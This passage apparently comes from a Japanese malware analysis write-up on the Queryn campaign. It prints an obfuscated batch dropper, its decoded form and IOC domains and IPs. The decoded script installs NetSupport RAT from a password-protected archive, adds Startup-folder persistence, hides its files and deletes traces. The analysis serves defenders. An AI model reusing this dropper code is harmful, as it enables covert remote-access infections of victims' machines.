922 | %dltpamgqdczxczx%%vhjgjvyvwnzxczx%%xgxdxqaviezxczx%%qqudvhbnejzxczx% /%qqudvhbnejzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%uxxuqqksskzxczx%%zqosobjskhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%xgxdxqaviezxczx%.%vbgiogjsbgzxczx%%yksanbcfaszxczx%%vbgiogjsbgzxczx%.%agquyfuaufzxczx%%yksanbcfaszxczx%%xkvioggnhazxczx%" "%AppData%\%dpepwqucghzxczx%%vbgiogjsbgzxczx%%dltpamgqdczxczx%%bhhhpfpdkdzxczx%%vhjgjvyvwnzxczx%%gggibjshxxzxczx%%vhjgjvyvwnzxczx%%dgiaetdkhgzxczx%%nvjsjhwqhazxczx%\%ftqfsivfhvzxczx%%vbgiogjsbgzxczx%%yksanbcfaszxczx%%uxxuqqksskzxczx%%vhjgjvyvwnzxczx%%vvkkkaaiejzxczx%%gggibjshxxzxczx%\%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%suyfjqgajhzxczx%%bhhhpfpdkdzxczx%%nvjsjhwqhazxczx% %dpepwqucghzxczx%%zqosobjskhzxczx%%yksanbcfaszxczx%%jgwjhbajhvzxczx%\%hxyegahajvzxczx%%bhhhpfpdkdzxczx%%vhjgjvyvwnzxczx%%pejajwqiffzxczx%%bhhhpfpdkdzxczx%%suyfjqgajhzxczx%%venpnkfmskzxczx%%gggibjshxxzxczx%\%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%suyfjqgajhzxczx%%bhhhpfpdkdzxczx%%nvjsjhwqhazxczx%%jgwjhbajhvzxczx%%xgxdxqaviezxczx%\%uxxuqqksskzxczx%%zqosobjskhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%xgxdxqaviezxczx%.%vbgiogjsbgzxczx%%yksanbcfaszxczx%%vbgiogjsbgzxczx%.%agquyfuaufzxczx%%yksanbcfaszxczx%%xkvioggnhazxczx%"
923 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%dpgdofjwndzxczx% +%gggibjshxxzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%"
924 | %nvjsjhwqhazxczx%%suyfjqgajhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%xkvioggnhazxczx%%vbgiogjsbgzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx% /%kcjzzfajhkzxczx%%dpepwqucghzxczx% %bhhhpfpdkdzxczx%%jgwjhbajhvzxczx%%yksanbcfaszxczx%%uxxuqqksskzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx% /%ehschesznazxczx%
925 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%dltpamgqdczxczx%%agquyfuaufzxczx%%vbgiogjsbgzxczx%%zqosobjskhzxczx%%yksanbcfaszxczx%%nvjsjhwqhazxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx%"
926 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%dltpamgqdczxczx%%agquyfuaufzxczx%%vbgiogjsbgzxczx%%zqosobjskhzxczx%%yksanbcfaszxczx%%nvjsjhwqhazxczx%32.%vbgiogjsbgzxczx%%yksanbcfaszxczx%%vbgiogjsbgzxczx%"
927 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%ewnnrnsntuzxczx%%fpwjhnpptjzxczx%%rjfkgkrrkwzxczx%%fpwjhnpptjzxczx%%kaagkkkfjezxczx%32.%zaqwgffggpzxczx%%kaagkkkfjezxczx%%kaagkkkfjezxczx%"
928 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%venpnkfmskzxczx%%gggibjshxxzxczx%%czzyfhrwhvzxczx%%dltpamgqdczxczx%%bhhhpfpdkdzxczx%100.%uxxuqqksskzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx%"
929 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%yksanbcfaszxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%cjdghpyhbjzxczx%%dgiaetdkhgzxczx%%agquyfuaufzxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%.%vbgiogjsbgzxczx%%yksanbcfaszxczx%%dgiaetdkhgzxczx%"
930 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%hcffffrhsgzxczx%%eejdhaacxgzxczx%%dpepwqucghzxczx%.%vbgiogjsbgzxczx%%yksanbcfaszxczx%%vbgiogjsbgzxczx%"
931 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%hcffffrhsgzxczx%%eejdhaacxgzxczx%%dpepwqucghzxczx%.%kaagkkkfjezxczx%%kcjzzfajhkzxczx%%rjfkgkrrkwzxczx%"
932 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%yksanbcfaszxczx%%gggibjshxxzxczx%%venpnkfmskzxczx%_%czzyfhrwhvzxczx%%xgxdxqaviezxczx%%bhhhpfpdkdzxczx%%vhjgjvyvwnzxczx%.%vbgiogjsbgzxczx%%yksanbcfaszxczx%%vbgiogjsbgzxczx%"
933 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%xgxdxqaviezxczx%%dltpamgqdczxczx%%vbgiogjsbgzxczx%%dltpamgqdczxczx%%suyfjqgajhzxczx%%xgxdxqaviezxczx%%vbgiogjsbgzxczx%.%uxxuqqksskzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx%"
934 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%hxyegahajvzxczx%%rjfkgkrrkwzxczx%%kcjzzfajhkzxczx%%rjfkgkrrkwzxczx%%ewnnrnsntuzxczx%%ivismnzvnozxczx%%hehshgjgjszxczx%.%zaqwgffggpzxczx%%kaagkkkfjezxczx%%kaagkkkfjezxczx%"
935 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%hxyegahajvzxczx%%rjfkgkrrkwzxczx%%kcjzzfajhkzxczx%%rjfkgkrrkwzxczx%%kaagkkkfjezxczx%32.%zaqwgffggpzxczx%%kaagkkkfjezxczx%%kaagkkkfjezxczx%"
936 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%bhhhpfpdkdzxczx%%zqosobjskhzxczx%%venpnkfmskzxczx%%dltpamgqdczxczx%%venpnkfmskzxczx%%uxxuqqksskzxczx%%gggibjshxxzxczx%%nvjsjhwqhazxczx%%jgwjhbajhvzxczx%%cjdghpyhbjzxczx%.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx%"
937 | %suyfjqgajhzxczx%%nvjsjhwqhazxczx%%nvjsjhwqhazxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%cjdghpyhbjzxczx% +%gggibjshxxzxczx% +%dpgdofjwndzxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%fpwjhnpptjzxczx%%rjfkgkrrkwzxczx%%rjfkgkrrkwzxczx%%fpwjhnpptjzxczx%%kaagkkkfjezxczx%32.%zaqwgffggpzxczx%%kaagkkkfjezxczx%%kaagkkkfjezxczx%"
938 | %nvjsjhwqhazxczx%%suyfjqgajhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%xkvioggnhazxczx%%vbgiogjsbgzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx% /%kcjzzfajhkzxczx%%dpepwqucghzxczx% %bhhhpfpdkdzxczx%%jgwjhbajhvzxczx%%yksanbcfaszxczx%%uxxuqqksskzxczx%%agquyfuaufzxczx%%agquyfuaufzxczx%32.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx% /%ehschesznazxczx%
939 | %uxxuqqksskzxczx%%zqosobjskhzxczx%%agquyfuaufzxczx% /%dgiaetdkhgzxczx% /%uyhhhakakazxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%%kaagkkkfjezxczx%%vbgiogjsbgzxczx%%gggibjshxxzxczx%%nvjsjhwqhazxczx%.%bhhhpfpdkdzxczx%%nvjsjhwqhazxczx%%dgiaetdkhgzxczx%"
940 | %uxxuqqksskzxczx%%zqosobjskhzxczx%%agquyfuaufzxczx% /%dgiaetdkhgzxczx% /%uyhhhakakazxczx% "%AppData%\7%jygabrjhcyzxczx%%suyfjqgajhzxczx%.%zqosobjskhzxczx%%uehjhfvjhfzxczx%%zqosobjskhzxczx%"
941 | %uxxuqqksskzxczx%%zqosobjskhzxczx%%agquyfuaufzxczx% /%dgiaetdkhgzxczx% /%uyhhhakakazxczx% "%AppData%\%zaqwgffggpzxczx%%bhhhpfpdkdzxczx%%vbgiogjsbgzxczx%%czzyfhrwhvzxczx%%zqosobjskhzxczx%%bhhhpfpdkdzxczx%%eejdhaacxgzxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%bhhhpfpdkdzxczx%%zqosobjskhzxczx%\%uxxuqqksskzxczx%%zqosobjskhzxczx%%gggibjshxxzxczx%%xkvioggnhazxczx%%nvjsjhwqhazxczx%%vhjgjvyvwnzxczx%%xgxdxqaviezxczx%.%vbgiogjsbgzxczx%%yksanbcfaszxczx%%vbgiogjsbgzxczx%.%agquyfuaufzxczx%%yksanbcfaszxczx%%xkvioggnhazxczx%"
942 | %uxxuqqksskzxczx%%zqosobjskhzxczx%%agquyfuaufzxczx% %0
943 | ```
944 |
945 | 簡単な文字列置換なので、復号すると以下のようになります。
946 |
947 | ```batch
948 | @echo off
949 | @chcp 1251
950 |
951 | taskkill /IM client32.exe /F
952 | ping -n 1 127.0.0.1 > nul
953 | "%AppData%\7za.exe" x -pRftdvthdfrgspsfeofdqtdjeftg -y "%AppData%\DriverStoreList.rtf" -o"%AppData%"
954 | start "client32.exe" "%AppData%\DriverStore\client32.exe"
955 | taskkill /IM rundll32.exe /F
956 | ping -n 1 127.0.0.1 > nul
957 | taskkill /IM rundll32.exe /F
958 | copy /y "%AppData%\DriverStore\desktop.ini.lnk" "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.lnk"
959 | attrib +h +s "%AppData%\DriverStore"
960 | taskkill /IM rundll32.exe /F
961 | attrib +s +h "%AppData%\DriverStore\client32.exe"
962 | attrib +s +h "%AppData%\DriverStore\client32.ini"
963 | attrib +s +h "%AppData%\DriverStore\HTCTL32.DLL"
964 | attrib +s +h "%AppData%\DriverStore\msvcr100.dll"
965 | attrib +s +h "%AppData%\DriverStore\nskbfltr.inf"
966 | attrib +s +h "%AppData%\DriverStore\NSM.ini"
967 | attrib +s +h "%AppData%\DriverStore\NSM.LIC"
968 | attrib +s +h "%AppData%\DriverStore\nsm_vpro.ini"
969 | attrib +s +h "%AppData%\DriverStore\pcicapi.dll"
970 | attrib +s +h "%AppData%\DriverStore\PCICHE%hehshgjgjszxczx%.DLL"
971 | attrib +s +h "%AppData%\DriverStore\PCICL32.DLL"
972 | attrib +s +h "%AppData%\DriverStore\remcmdstub.exe"
973 | attrib +s +h "%AppData%\DriverStore\TCCTL32.DLL"
974 | taskkill /IM rundll32.exe /F
975 | del /f /q "%AppData%\DriverStoreList.rtf"
976 | del /f /q "%AppData%\7za.exe"
977 | del /f /q "%AppData%\DriverStore\desktop.ini.lnk"
978 | del %0
979 | ```
980 |
981 | このように `List.cmd` によって `DriverStoreList.rtf` を解凍して、中のプログラムを実行しています。
982 |
983 | ## Malware Analysis
984 | 検体はNetSupport RATなのであまり面白くないです。検体は以下に示しますが、既に様々な研究者が解析結果を公開しているのでそれらを参照することを推奨します。
985 |
986 | [https://app.any.run/tasks/25cb8356-2e62-4185-94d6-df6fab796bc0](https://app.any.run/tasks/25cb8356-2e62-4185-94d6-df6fab796bc0)
987 |
988 | ## OPSEC
989 | FireEyeのレポートでも少し紹介されていますが、Querynが用いているC2サーバは非常に管理が甘く、具体的にはOpenDirとなっています。
990 |
991 | 
992 |
993 | 
994 |
995 | また、C2へ接続したユーザのログも公開されており、影響範囲などを推定することが可能です。
996 |
997 | 
998 |
999 | ## Conclusion
1000 | これはあくまで推測でしかありませんが、Querynの活動が注目されるようになった時期と、EITest CampaignがProofpointのKafeineらによってシンクホールされた時期は同期しているように思います。また、Palo Alto Networks Unit42のBrad Duncanが"[EITest: HoeflerText Popups Targeting Google Chrome Users Now Push RAT Malware](https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/)"等で報告しているように、EITest CampaignでNetSupport Manager RATが用いられてきたことは多くの研究者によって解析されてきました。これらは全くの無関係というわけではないでしょう。
1001 |
1002 | 今現在、日本に属するIPアドレスからはQuerynは観測できないと考えられます。観測報告の多くは北米に集中しており、かつてEITestがメインターゲットとしてきた地域と一致しています。仮にQuerynがEITestと同じ攻撃者によって画策されたものであれば、日本にQuerynの影響が及ぶのは時間の問題かもしれません。今回解析したJavaScriptファイルをVirusTotalにSubmitしたところ、5/59のセキュリティ製品しか検知しませんでした。これまで紹介したとおり、非常に高度に難読化とAnti-Debugが施されているため、これらを検知することは容易ではないでしょう。日本のセキュリティ担当者も、こうした攻撃キャンペーンがあるということを把握し、十分に注意しておくことが必要でしょう。
1003 |
1004 | 
1005 |
1006 | ## IOC
1007 | ```
1008 |
1009 | query[.]network 45.32.52.31
1010 | boobahbaby[.]com 45.32.52.31
1011 | track[.]amishbrand[.]com 185.244.149.74
1012 | mean[.]nitrpindia[.]com 93.95.100.178
1013 | snax[.]saradiecasting[.]com 93.95.100.178
1014 | four[.]sineadhollywoodnutt[.]com 93.95.100.178
1015 |
1016 |
1017 | [a-z0-9]{8}.intro2[.]biox-shop[.]com 5.104.226.126
1018 | [0-9a-f]{8}.login3[.]kimbrelelectric[.]com 93.95.100.138
1019 | [0-9a-f]{8}.phpmyadmin[.]greentechsupply[.]us 185.52.3.248
1020 | 91.243.80.83
1021 | 136.243.158.225
1022 | desjardinscourriel818654[.]pw 95.215.108.165, 93.179.68.25, 185.224.249.151
1023 | ```
1024 |
--------------------------------------------------------------------------------